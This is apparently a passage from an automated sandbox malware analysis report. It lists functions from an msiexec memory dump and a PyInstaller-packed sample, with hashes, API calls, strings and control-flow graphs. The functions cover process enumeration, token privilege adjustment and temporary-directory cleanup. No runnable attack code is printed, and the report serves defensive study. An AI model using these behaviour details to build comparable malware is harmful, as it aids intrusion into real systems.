                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9111F22638AC795DB64AB25F855BAAA762FFC4F80F815031DA4E43A29DE3CD405CB10
                                                                                                                                                                                                                          Function 00007FF775AE3E24 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1083639309-0
                                                                                                                                                                                                                          • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                                          • Instruction ID: 79ef0ba9a1ad28870e206111c547275ad5d10005f4d8d584ab38fbeb52480caf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D21E932A3CAC681E770AB11F85976AA7A1FFC4F54F814235C59E425A8DF3DE845CB10
                                                                                                                                                                                                                          Function 00007FF775AE2F0C Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 299056699-0
                                                                                                                                                                                                                          • Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                                          • Instruction ID: 8d922fa65e595363e50e8e9e4a4973cfbd6e2de011af3e7d86043601af59f5dd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F601C82793CA8282E720AB21F85667DAB70FFC8F45F810139E98E42674CE3DD9548610
                                                                                                                                                                                                                          Function 00007FF775AE3CE4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                          • String ID: Unknown
                                                                                                                                                                                                                          • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                          • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                                          • Instruction ID: e9007a830aa081a2cad0645f374e79254ae0d9e6d7180ad2d4dabedef2f223bf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB31BB7662CAC485D770EB19F4997AAB7A0FB88B40F410536DA8D83B68DF3CD554CB10
                                                                                                                                                                                                                          Function 00007FF775AE4004 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2850635065-0
                                                                                                                                                                                                                          • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction ID: 761befd8c85a2178b596b873cf8176ce027f57f68e51a3463de7c9232b29b33e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33112E32A3CAC281E770AB20F48976AA7A4FFC4B54F814234C69D42698DF3DD504CB10
                                                                                                                                                                                                                          Function 00007FF775AE3744 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                          • API String ID: 3001812590-640692576
                                                                                                                                                                                                                          • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                                          • Instruction ID: ef758e067e2639cd4759bf81cc3cc0189d191ca7c61dca18b3db828622c90f19
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C31192762C6C186D730EB64E4997AAB7A0FB84B00F800136E68D83A58EB3DD448CB10
                                                                                                                                                                                                                          Function 00007FF775AE2F9C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3922
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3935
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE38C4: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3945
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3980
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3995
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE40E4: GetCurrentProcess.KERNEL32 ref: 00007FF775AE414B
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE40E4: OpenProcessToken.ADVAPI32 ref: 00007FF775AE415E
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF775AE4186
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE40E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF775AE41B1
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE40E4: CloseHandle.KERNEL32 ref: 00007FF775AE41BC
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE40E4: OpenProcess.KERNEL32 ref: 00007FF775AE41D1
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE40E4: CloseHandle.KERNEL32 ref: 00007FF775AE4249
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 00007FF775AE3037
                                                                                                                                                                                                                          • HeapFree.KERNEL32 ref: 00007FF775AE304A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Process$CloseHandleHeapOpenToken$AdjustCreateCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                                                                          • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                          • API String ID: 3235591951-2286007224
                                                                                                                                                                                                                          • Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                                          • Instruction ID: c46379174b565fa551dfa09b207e5d31d85eaef60676594de9b2740253ef48e4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2711EC26D38AC385EB10FB25F84ABA9BBA0FF84B04F824135D54C43665DF3CE4598B60

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 00007FF641F21000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 7ff641f21000-7ff641f23536 call 7ff641f2f138 call 7ff641f2f140 call 7ff641f2bb70 call 7ff641f34700 call 7ff641f34794 call 7ff641f233e0 14 7ff641f23538-7ff641f2353f 0->14 15 7ff641f23544-7ff641f23566 call 7ff641f218f0 0->15 16 7ff641f2371a-7ff641f23735 call 7ff641f2b870 14->16 20 7ff641f23736-7ff641f2374c call 7ff641f23f70 15->20 21 7ff641f2356c-7ff641f23583 call 7ff641f21bf0 15->21 29 7ff641f2374e-7ff641f2377b call 7ff641f276a0 20->29 30 7ff641f23785-7ff641f2379a call 7ff641f225f0 20->30 25 7ff641f23588-7ff641f235c1 21->25 27 7ff641f235c7-7ff641f235cb 25->27 28 7ff641f23653-7ff641f2366d call 7ff641f27e10 25->28 32 7ff641f23638-7ff641f2364d call 7ff641f218e0 27->32 33 7ff641f235cd-7ff641f235e5 call 7ff641f34560 27->33 45 7ff641f2366f-7ff641f23675 28->45 46 7ff641f23695-7ff641f2369c 28->46 41 7ff641f2377d-7ff641f23780 call 7ff641f2f36c 29->41 42 7ff641f2379f-7ff641f237be call 7ff641f21bf0 29->42 47 7ff641f23712 30->47 32->27 32->28 50 7ff641f235e7-7ff641f235eb 33->50 51 7ff641f235f2-7ff641f2360a call 7ff641f34560 33->51 41->30 62 7ff641f237c1-7ff641f237ca 42->62 52 7ff641f23677-7ff641f23680 45->52 53 7ff641f23682-7ff641f23690 call 7ff641f3415c 45->53 54 7ff641f236a2-7ff641f236c0 call 7ff641f27e10 call 7ff641f27f80 46->54 55 7ff641f23844-7ff641f23863 call 7ff641f23e90 46->55 47->16 50->51 68 7ff641f23617-7ff641f2362f call 7ff641f34560 51->68 69 7ff641f2360c-7ff641f23610 51->69 52->53 53->46 76 7ff641f236c6-7ff641f236c9 54->76 77 7ff641f2380f-7ff641f2381e call 7ff641f28400 54->77 65 7ff641f23871-7ff641f23882 call 7ff641f21bf0 55->65 66 7ff641f23865-7ff641f2386f call 7ff641f23fe0 55->66 62->62 67 7ff641f237cc-7ff641f237e9 call 7ff641f218f0 62->67 79 7ff641f23887-7ff641f238a1 call 7ff641f286b0 65->79 66->79 67->25 86 7ff641f237ef-7ff641f23800 call 7ff641f225f0 67->86 68->32 82 7ff641f23631 68->82 69->68 76->77 83 7ff641f236cf-7ff641f236f6 call 7ff641f21bf0 76->83 93 7ff641f2382c-7ff641f2382f call 7ff641f27c40 77->93 94 7ff641f23820 77->94 95 7ff641f238af-7ff641f238c1 SetDllDirectoryW 79->95 96 7ff641f238a3 79->96 82->32 97 7ff641f236fc-7ff641f23703 call 7ff641f225f0 83->97 98 7ff641f23805-7ff641f2380d call 7ff641f3415c 83->98 86->47 104 7ff641f23834-7ff641f23836 93->104 94->93 100 7ff641f238d0-7ff641f238ec call 7ff641f26560 call 7ff641f26b00 95->100 101 7ff641f238c3-7ff641f238ca 95->101 96->95 108 7ff641f23708-7ff641f2370a 97->108 98->79 117 7ff641f23947-7ff641f2394a call 7ff641f26510 100->117 118 7ff641f238ee-7ff641f238f4 100->118 101->100 105 7ff641f23a50-7ff641f23a58 101->105 104->79 111 7ff641f23838 104->111 109 7ff641f23a5a-7ff641f23a77 PostMessageW GetMessageW 105->109 110 7ff641f23a7d-7ff641f23aaf call 7ff641f233d0 call 7ff641f23080 call 7ff641f233a0 call 7ff641f26780 call 7ff641f26510 105->110 108->47 109->110 111->55 125 7ff641f2394f-7ff641f23956 117->125 120 7ff641f238f6-7ff641f23903 call 7ff641f265a0 118->120 121 7ff641f2390e-7ff641f23918 call 7ff641f26970 118->121 120->121 133 7ff641f23905-7ff641f2390c 120->133 135 7ff641f2391a-7ff641f23921 121->135 136 7ff641f23923-7ff641f23931 call 7ff641f26cd0 121->136 125->105 130 7ff641f2395c-7ff641f23966 call 7ff641f230e0 125->130 130->108 143 7ff641f2396c-7ff641f23980 call 7ff641f283e0 130->143 138 7ff641f2393a-7ff641f23942 call 7ff641f22870 call 7ff641f26780 133->138 135->138 136->125 148 7ff641f23933 136->148 138->117 151 7ff641f23982-7ff641f2399f PostMessageW GetMessageW 143->151 152 7ff641f239a5-7ff641f239e1 call 7ff641f27f20 call 7ff641f27fc0 call 7ff641f26780 call 7ff641f26510 call 7ff641f27ec0 143->152 148->138 151->152 162 7ff641f239e6-7ff641f239e8 152->162 163 7ff641f239ea-7ff641f23a00 call 7ff641f281f0 call 7ff641f27ec0 162->163 164 7ff641f23a3d-7ff641f23a4b call 7ff641f218a0 162->164 163->164 171 7ff641f23a02-7ff641f23a10 163->171 164->108 172 7ff641f23a31-7ff641f23a38 call 7ff641f22870 171->172 173 7ff641f23a12-7ff641f23a2c call 7ff641f225f0 call 7ff641f218a0 171->173 172->164 173->108
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                                                                                          • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                                                          • API String ID: 514040917-585287483
                                                                                                                                                                                                                          • Opcode ID: 0a04b38bed04a14b463916ac8b6dd5067d5cff25c4ec1f8a055a289e318ab9ad
                                                                                                                                                                                                                          • Instruction ID: ce4b8f7df4f6f8621b1c120936bdac7f041be9b197732ae72ec19b3cc8f6e948
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a04b38bed04a14b463916ac8b6dd5067d5cff25c4ec1f8a055a289e318ab9ad
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99F19F61B0C6C291FB9AFB21D6552F963E1AF98780F844032DA1DC36D6EF2DE55AC301
                                                                                                                                                                                                                          Function 00007FF641F45C74 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 335 7ff641f45c74-7ff641f45ce7 call 7ff641f459a8 338 7ff641f45ce9-7ff641f45cf2 call 7ff641f343d4 335->338 339 7ff641f45d01-7ff641f45d0b call 7ff641f37830 335->339 346 7ff641f45cf5-7ff641f45cfc call 7ff641f343f4 338->346 344 7ff641f45d26-7ff641f45d8f CreateFileW 339->344 345 7ff641f45d0d-7ff641f45d24 call 7ff641f343d4 call 7ff641f343f4 339->345 348 7ff641f45e0c-7ff641f45e17 GetFileType 344->348 349 7ff641f45d91-7ff641f45d97 344->349 345->346 362 7ff641f46042-7ff641f46062 346->362 355 7ff641f45e19-7ff641f45e54 GetLastError call 7ff641f34368 CloseHandle 348->355 356 7ff641f45e6a-7ff641f45e71 348->356 352 7ff641f45dd9-7ff641f45e07 GetLastError call 7ff641f34368 349->352 353 7ff641f45d99-7ff641f45d9d 349->353 352->346 353->352 360 7ff641f45d9f-7ff641f45dd7 CreateFileW 353->360 355->346 369 7ff641f45e5a-7ff641f45e65 call 7ff641f343f4 355->369 358 7ff641f45e79-7ff641f45e7c 356->358 359 7ff641f45e73-7ff641f45e77 356->359 366 7ff641f45e82-7ff641f45ed7 call 7ff641f37748 358->366 367 7ff641f45e7e 358->367 359->366 360->348 360->352 374 7ff641f45ed9-7ff641f45ee5 call 7ff641f45bb0 366->374 375 7ff641f45ef6-7ff641f45f27 call 7ff641f45728 366->375 367->366 369->346 374->375 382 7ff641f45ee7 374->382 380 7ff641f45f29-7ff641f45f2b 375->380 381 7ff641f45f2d-7ff641f45f6f 375->381 383 7ff641f45ee9-7ff641f45ef1 call 7ff641f39dd0 380->383 384 7ff641f45f91-7ff641f45f9c 381->384 385 7ff641f45f71-7ff641f45f75 381->385 382->383 383->362 388 7ff641f46040 384->388 389 7ff641f45fa2-7ff641f45fa6 384->389 385->384 387 7ff641f45f77-7ff641f45f8c 385->387 387->384 388->362 389->388 391 7ff641f45fac-7ff641f45ff1 CloseHandle CreateFileW 389->391 392 7ff641f46026-7ff641f4603b 391->392 393 7ff641f45ff3-7ff641f46021 GetLastError call 7ff641f34368 call 7ff641f37970 391->393 392->388 393->392
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                                                                                          • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                          • Instruction ID: 69ea1258de8fc715cee994865935ac02d31da5275dc69634fb2ef91effb7241e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0C1C132B2CA4586EB51FFA8C5902AC37A1FB59B98B015225DF1E977E5DF38E452C300
                                                                                                                                                                                                                          Function 00007FF641F279B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00007FF641F27EF9,00007FF641F239E6), ref: 00007FF641F27A1B
                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00007FF641F27EF9,00007FF641F239E6), ref: 00007FF641F27A9E
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,00007FF641F27EF9,00007FF641F239E6), ref: 00007FF641F27ABD
                                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,00007FF641F27EF9,00007FF641F239E6), ref: 00007FF641F27ACB
                                                                                                                                                                                                                          • FindClose.KERNEL32(?,00007FF641F27EF9,00007FF641F239E6), ref: 00007FF641F27ADC
                                                                                                                                                                                                                          • RemoveDirectoryW.KERNELBASE(?,00007FF641F27EF9,00007FF641F239E6), ref: 00007FF641F27AE5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                          • String ID: %s\*
                                                                                                                                                                                                                          • API String ID: 1057558799-766152087
